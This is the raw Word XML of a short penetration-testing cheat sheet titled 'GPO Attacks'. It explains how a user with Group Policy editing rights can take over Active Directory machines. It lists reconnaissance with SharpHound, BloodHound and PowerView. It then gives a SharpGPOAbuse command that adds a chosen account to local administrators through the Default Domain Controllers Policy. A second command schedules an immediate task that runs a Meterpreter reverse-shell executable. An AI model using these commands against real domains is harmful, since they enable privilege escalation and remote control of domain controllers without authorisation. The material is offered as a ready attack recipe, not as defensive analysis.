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8235" w14:textId="43BB6F32" w:rsidR="000D72FC" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>GPO Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360BD09A" w14:textId="755197BC" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:r w:rsidRPr="378EBA00">
        <w:t>If you find out that you user(victim) is allowed to manage domain GPOs you can perform following to abuse in your favor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C6C7E" w14:textId="5CDEFE94" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00"/>
    <w:p w14:paraId="31686788" w14:textId="0EA6666C" w:rsidR="378EBA00" w:rsidRDefault="475159EF" w:rsidP="378EBA00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upload Sharphound.exe and perform an AD export of the schema. Parse in Bloodhound as well for a graphical result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364094A" w14:textId="19B09FDF" w:rsidR="378EBA00" w:rsidRDefault="475159EF" w:rsidP="378EBA00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Check that your user is part of a GPO editing (“GPO Managers” in the example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E00357" w14:textId="4383A08A" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CFD781B" wp14:editId="792671D1">
            <wp:extent cx="3476625" cy="2361208"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1031013198" name="Picture 103101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44BA" w14:textId="3A112C9E" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="378EBA00">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Check which policies could we possibly use in our </w:t>
      </w:r>
      <w:r w:rsidR="00CB6619" w:rsidRPr="378EBA00">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>favor (</w:t>
      </w:r>
      <w:r w:rsidRPr="378EBA00">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import PoverView.ps1 and run)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01626A99" w14:textId="17C7C0EF" w:rsidR="378EBA00" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get-DomainPolicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C914E" w14:textId="40964896" w:rsidR="378EBA00" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5CD8B3" w14:textId="0C42D95F" w:rsidR="378EBA00" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPODisplayName  : Default Domain Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5C339" w14:textId="7EC8933E" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C76D7FA" w14:textId="48F3D1D2" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="378EBA00">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can check that as well in Bloodhound from </w:t>
      </w:r>
      <w:r w:rsidRPr="378EBA00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User -&gt; Effective Inbound GPOs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC64580" w14:textId="12D5095A" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B471929" wp14:editId="5661560D">
            <wp:extent cx="4572000" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1922551806" name="Picture 192255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0D71" w14:textId="3C50A123" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00"/>
    <w:p w14:paraId="711A2FC1" w14:textId="7926766B" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3832DFB4" w14:textId="7FD2C795" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="378EBA00">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Now you can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidRPr="378EBA00">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SharpGPOAbuse</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="378EBA00">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to add your user to the Admin group via vulnerable GPO (just give the username you want to add and the name of the vulnerable GPO):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B8873" w14:textId="3E170B67" w:rsidR="378EBA00" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount 'HHogan' --GPOName 'Default Domain Controllers Policy'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01995A49" w14:textId="2B2D3F6D" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE8398E" wp14:editId="3FE96DCF">
            <wp:extent cx="4572000" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="717244999" name="Picture 717244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C6C" w14:textId="6DDC2C4E" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If you don’t want to wait run a “gpupdate”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0243BE71" w14:textId="3826569F" w:rsidR="378EBA00" w:rsidRDefault="475159EF" w:rsidP="378EBA00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On next GPO update your user should be added to local admins on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A48D45" w14:textId="0873F93A" w:rsidR="475159EF" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783BCF28" w14:textId="63AB7692" w:rsidR="475159EF" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Altenative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E0036" w14:textId="3BC24D0C" w:rsidR="475159EF" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can upload an immediate task that invokes a Meterpreter Revshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F4FDD" w14:textId="5438B088" w:rsidR="475159EF" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="475159EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./SharpGPOAbuse.exe --AddComputerTask --TaskName "Shell" --Author OFFICE\Administrator --Command "cmd.exe" --Arguments "/c C:\Temp\reverse.exe" --GPOName "Default Domain Controllers Policy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F003692" w14:textId="2613DC33" w:rsidR="475159EF" w:rsidRDefault="475159EF" w:rsidP="475159EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DCA61A" w14:textId="0EB8B19D" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00"/>
    <w:p w14:paraId="514AD400" w14:textId="56465581" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEE7FDC" w14:textId="15C036E2" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57284922" w14:textId="6A97C63A" w:rsidR="378EBA00" w:rsidRDefault="378EBA00" w:rsidP="378EBA00">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="378EB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1995"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F4CFF94"/>
    <w:lvl w:ilvl="0" w:tplc="9BC43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AC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27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A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6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ED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C5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0E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87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DF6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7366920A"/>
    <w:lvl w:ilvl="0" w:tplc="08FAA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F40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6E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EB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44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49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43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66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0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7AF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87A2D882"/>
    <w:lvl w:ilvl="0" w:tplc="782EE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6F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81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60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EC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03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8D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CE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A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8A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="718ECFAE"/>
    <w:lvl w:ilvl="0" w:tplc="F2D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2B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C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6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04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A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CC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F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A8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82258"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CB2C8B6"/>
    <w:lvl w:ilvl="0" w:tplc="65E0B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6F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C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EA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47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C4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88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8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5C1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A07E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E967DBE"/>
    <w:lvl w:ilvl="0" w:tplc="3FEC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02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E1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C2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00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8A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E5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E3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51248">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="868687693">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1320962718">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="662515078">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="559363111">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="48689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CF9CA5"/>
    <w:rsid w:val="000D72FC"/>
    <w:rsid w:val="00CB6619"/>
    <w:rsid w:val="00D472B1"/>
    <w:rsid w:val="378EBA00"/>
    <w:rsid w:val="475159EF"/>
    <w:rsid w:val="6DCF9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EF5E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{942A5036-2CAE-4A7E-B122-9B57154C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FSecureLABS/SharpGPOAb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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-21T10:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-24T09:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>